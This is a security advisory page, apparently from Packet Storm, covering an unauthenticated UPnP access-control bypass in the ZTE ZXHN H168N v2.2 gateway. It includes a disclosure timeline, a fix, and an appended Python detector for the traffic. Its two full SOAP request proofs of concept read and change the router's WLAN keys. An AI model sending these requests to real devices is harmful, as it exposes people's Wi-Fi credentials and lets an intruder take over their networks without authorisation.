ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass

Published: 11 Dec 2018 00:00:00. Reported by Usman Saeed. Type: packetstorm. Source: packetstormsecurity.com. 1709 views.


Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass Vulnerability | 11 Dec 2018 00:00 | zdt |
| Circl | CVE-2018-7357 | 11 Dec 2018 00:00 | circl |
| Circl | CVE-2018-7358 | 11 Dec 2018 00:00 | circl |
| CVE | CVE-2018-7357 | 14 Nov 2018 15:00 | cve |
| CVE | CVE-2018-7358 | 14 Nov 2018 15:00 | cve |
| Cvelist | CVE-2018-7357 | 14 Nov 2018 15:00 | cvelist |
| Cvelist | CVE-2018-7358 | 14 Nov 2018 15:00 | cvelist |
| Exploit DB | ZTE ZXHN H168N - Improper Access Restrictions | 11 Dec 2018 00:00 | exploitdb |
| exploitpack | ZTE ZXHN H168N - Improper Access Restrictions | 11 Dec 2018 00:00 | exploitpack |
| NVD | CVE-2018-7357 | 14 Nov 2018 15:29 | nvd |
[*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for educational purposes; I would not be responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Protocol: UPnP

[+] Affected Hardware/Software:

Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to WLAN password:

```http
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>
```

2. Unauthenticated WLAN passphrase change:

```http
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
```

[*] Solution:

UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.

[*] Note:

There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

[+] Responsible Disclosure:

Vulnerabilities identified - 20 August, 2018
Reported to ZTE - 28 August, 2018
ZTE official statement - 17 September 2018
ZTE patched the vulnerability - 12 November 2018
The operator pushed the update - 12 November 2018
CVE published - CVE-2018-7357 and CVE-2018-7358
Public disclosure - 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
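The two findings above are plain SOAP calls to the gateway's `WLANConfiguration` service, so a network sensor watching the UPnP port can recognise them. The following is an added example, not part of the advisory or of ZTE's firmware: it parses a raw captured HTTP request, pulls the action name out of the SOAP body, and reports the two key-handling actions together with whether the request carried any `Authorization` header at all. The sample request, the documentation IP `192.0.2.1` and the port `52869` from the advisory are assumptions built in for the sake of a runnable check.

```python
# Added example, not from the advisory: check raw HTTP requests captured on the gateway's UPnP port (52869).
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WLAN_URN = "urn:dslforum-org:service:WLANConfiguration:1"
SENSITIVE = {  # action -> impact, as described in the advisory
    "GetSecurityKeys": "reads WLAN key/passphrase (CVE-2018-7357)",
    "SetSecurityKeys": "changes WLAN key/passphrase (CVE-2018-7358)",
}

def parse_request(raw):
    # Split a raw HTTP/1.1 request into (method, path, headers, body).
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def soap_action(body):
    # (service_urn, action) of the first element inside s:Body.
    soap_body = ET.fromstring(body).find(f"{{{SOAP_NS}}}Body")
    if soap_body is None or len(soap_body) == 0:
        return None, None
    urn, _, action = soap_body[0].tag.lstrip("{").partition("}")
    return urn, action

def check_upnp_request(raw):
    # Finding dict for a sensitive WLANConfiguration call, else None.
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not body.lstrip().startswith("<"):
        return None
    try:
        urn, action = soap_action(body)
    except ET.ParseError:  # not SOAP at all; nothing to flag here
        return None
    if urn != WLAN_URN or action not in SENSITIVE:
        return None
    return {"path": path, "action": action, "impact": SENSITIVE[action],
            "authenticated": "authorization" in headers}

# Constructed sample mirroring finding 1 (documentation IP, no credentials).
SAMPLE_GET_KEYS = (
    "POST /control/igd/wlanc_1_1 HTTP/1.1\r\nHost: 192.0.2.1:52869\r\n"
    f'SOAPACTION: "{WLAN_URN}#GetSecurityKeys"\r\n\r\n'
    f'<?xml version="1.0" encoding="utf-8"?><s:Envelope xmlns:s="{SOAP_NS}">'
    f'<s:Body><u:GetSecurityKeys xmlns:u="{WLAN_URN}"/></s:Body></s:Envelope>'
)
```

A finding with `authenticated` false on the WAN-facing side of a gateway is exactly the condition the advisory describes; on a patched device the same check is still useful as a regression test that the actions are no longer reachable without credentials.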
